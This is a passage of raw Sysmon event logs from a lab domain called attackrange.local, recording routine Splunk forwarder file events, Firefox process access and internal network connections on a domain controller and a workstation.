Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.423{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.422{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:06.058{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7604C4AD419944125069C5020455245,SHA256=466966B185449ABBF785059A9B41A41366A6C846D77C582F6354BF8258758E98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083112Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:07.541{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5624293544F573F29A06E3E00102153C,SHA256=CE5A9D9B1E4CC18DFE864D03D4DDB57EE26C3D462B3710594245144982A166E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:07.089{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35E83E6BC8E81DFCCFD80E53134C720A,SHA256=186EBF242F24BF7DDEE7F99E1D9EE1D2381C2BDA281D1BF510C899C377E51E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083113Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:08.541{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=371299CE2BE3F51DD4954D7A90A2E8B9,SHA256=4D561367CA1B72810B5CB8B09C8C6196CCFC0813BB11AA6C1AB20F21DEDB8A6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:08.103{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40407DB559AE6644369B5682EFD60E1F,SHA256=54CD52F8C3281EAFF4C04709D2CB1974D07962DA62F41B2107572E3D2D76F5E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083114Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:09.541{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760DCE52A5B4EE9FE85C24834DF5C55D,SHA256=5B9705EF0E03FB1B2E6BEB42161DB1E527479EE66ECB06D07F59D490F7D356B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:09.104{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F212ED6F1B8E59946F509D014771BF1,SHA256=D900B40D991BC6FB41F2128496051E593DDAEC4C6EED9BFE5ABC7198C66E8CE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083117Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:08.768{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50141-false10.0.1.12-8000- 23542300x800000000000000083116Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:10.542{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BC2093EDD796DCCF8DB580CA0331373,SHA256=41C4842EED69BBBA55B6939DA0F5E16C32D92A18D1F6E7FE25F51EC57A344623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:10.141{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C8F7737386A97DA53068E75CD87958A,SHA256=1738AA12A74A4D17D56A26A7AA9829F0B8304B52D903A9BD644026D5A1A5B659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083115Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:10.404{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-032MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083119Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:11.650{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B5CE4F90FCE19451303A13ED4974DA6,SHA256=820F80BC2162D5637D4C9D6B4C1DF68EAFC592B599A743DE39B5E0DD4C31354B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:11.156{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66A37469DAA7126D9A8010D3CF60D6D,SHA256=3ADAEBA2BC693B97BA08C8B440386415F8E5A139CE917FAD83AC4B5E8BD1A99F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083118Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:11.418{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-033MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083120Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:12.699{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E711F0AB01EB1F70D71096FC3D8D87D1,SHA256=FB0DD74EF5F08385A44915B2FB4079B3D25DCE1F3CD1C2BE1D2A5CCAEE819BA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:12.170{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656065F239714034B11DE0030002AA13,SHA256=23F34EFDFDD17D25204F5741B1DF28F9CFA5F08D658B8002C970D8759FAFE520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083121Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:13.700{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D109112D9EB5F863DC49FD83C2CACFE,SHA256=10288A7E6590070429A01E7DB7088E3D22FA84219C0A092F6E06AA6650F2B6CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:13.186{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF60C9E627E2299057B42BB9EB6BABD,SHA256=7C42DB4DDE365122D3F82F43933265EC64B9B5E7C9CB7E8884B4135D21D47CBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:11.413{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51857-false10.0.1.12-8000- 23542300x800000000000000083122Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:14.793{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E51236678971F41EE92F85C06A716D5,SHA256=547A7C21F8E16103DFA2932F90D2688BD4F608D89803CFA13D334BCE4B32BEB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:14.201{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6B1A295DCC353179FE679F9614406C8,SHA256=DF39FB2767E53AC749F3BB146FF9A846C7A916E2C5F61F5E7C40DE9FC15A2133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083123Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:15.903{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEA68D5B2DC22564A0DF632BA8892438,SHA256=E65EFFDDFC1148AA6B92D95840B045C057D0B1765A16C81B39C146B82529979E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:15.899{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=33F44E387E2F57F20D311F19D42CE303,SHA256=08DB2EF7CDC77857DD2545FD14A7F7C9804C54ED71189DD51489A2994B8F9E46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:15.218{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE125B68EC9C4DB509270A128C3F3CF,SHA256=82EF37A573E72636B3A01E02E5E10AA2FC10B5151C2D904937FD78A6F7CD005D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083124Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:13.817{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50142-false10.0.1.12-8000- 23542300x8000000000000000106769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:16.236{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37097F4342B971E6B5D8861E91F56C38,SHA256=C373242BBC58CFCC475A64682C2B55664CE00223DCA6C5807B0C3BF78B24FA34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:17.252{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E639BE077D9681179EC2F9852EEDAE6,SHA256=52BF386FF5ECAA2922C9037924A59555F0F5BCFE79A347AD35184C39D3E28B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083125Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:17.103{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DB948B23B1138529FFAE5CA0943CE7D,SHA256=11E23C6127AD4CE1B583E945B31D1C3450FD11900E04836D5AB730BC183FE91A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:18.783{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:18.767{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:18.767{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:18.267{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3025CAAC53455150EC4D4C6A13B2A937,SHA256=22546980597953F8CB4D4BBEA43D2284A3ECC29ACE062B7664A881A48E9D7D10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083126Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:18.103{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5FFC428F0761DCA092CC69D1DE3ECF9,SHA256=D3CCD6958BCB7A77B58A69DBF70B85160EA2D2184E9EBC36A9AAA76A67E543FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083128Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:19.212{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BAC64D8458D811481AC29AFB8647E92,SHA256=77FC241CE06590B1A6BD6C4A72562CDDA5CCA89DAAFD3EAAA8D428202770EC32,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:17.409{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51858-false10.0.1.12-8000- 23542300x8000000000000000106775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:19.268{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30FD13E6B275BD5994BBB5E5A641DFB2,SHA256=B897367D1D3314F3454ECB426C11C3DE89AA4D238524C47A7714DAA72CF9B0F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083127Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:19.041{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E47419DB6F60B29F83D28A2CFC7C74BA,SHA256=B0295DA6A81EF225F5E8916015DF6BCC79CEEB923BF744FDAE33452F6715E765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083129Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:20.212{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EEADDC366B0AFCDF29ACE6B0AD7253B,SHA256=71304A23DEA82211F8EAB16F983C43C638629B10C4FAF5725718C86AB5C9F1B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:20.283{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4659E60371F90D1F1C19181339B2B78C,SHA256=9889F2F218D0393A592A3BD64A124C781B1DAF48DC32A514446CF7E33AF08F4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:21.316{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF66407FC24482BC3BFDA74FFE0B71F7,SHA256=7B611C26A34C68FEA9438C83AB372C2831F79BC9381BF125C865087FEB969B6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083130Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:21.212{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E46B3C68B9CB84220A6D2FBD5F4D6354,SHA256=4B24A0746376FC3DA686DA5A4C4EC40471D0205019C35945EA31429168E3F272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:22.334{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F3F31C168DFEE2D77F6C649729B63D,SHA256=95F1CCB83EADD09D5F4C28443E934D20F16C95455831F3C83E46F3CF3A18711A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083132Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:19.658{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50143-false10.0.1.12-8000- 23542300x800000000000000083131Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:22.213{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=253B1E3E17D79D3B8385285A32F29D2E,SHA256=D3199F5C4C29170CFE9589EED5B63C543F36923C8D881E5EEC24FBC873D6EB2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:23.365{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB725021786CD123883E4EA309B4234,SHA256=7BA18525B3EE9FE68A44CD9BDED19A82A139EAA850E0A54C1364B46400ADEB22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083133Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:23.213{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92540B5252EB7971AA2A8E8073294B62,SHA256=1B85E53F59115349D293F37B188ABD5296B682A3C507E68D9003BB0F1BB8F548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083134Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:24.213{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11F8B3975CB99D89727B15742C7CAB21,SHA256=58C1C52AF1910F9D6B301AFE728CC3B2813D3D07C9B468C6B1811421CB41478B,IMPHASH=00000000000000000000000000000000falsetrue 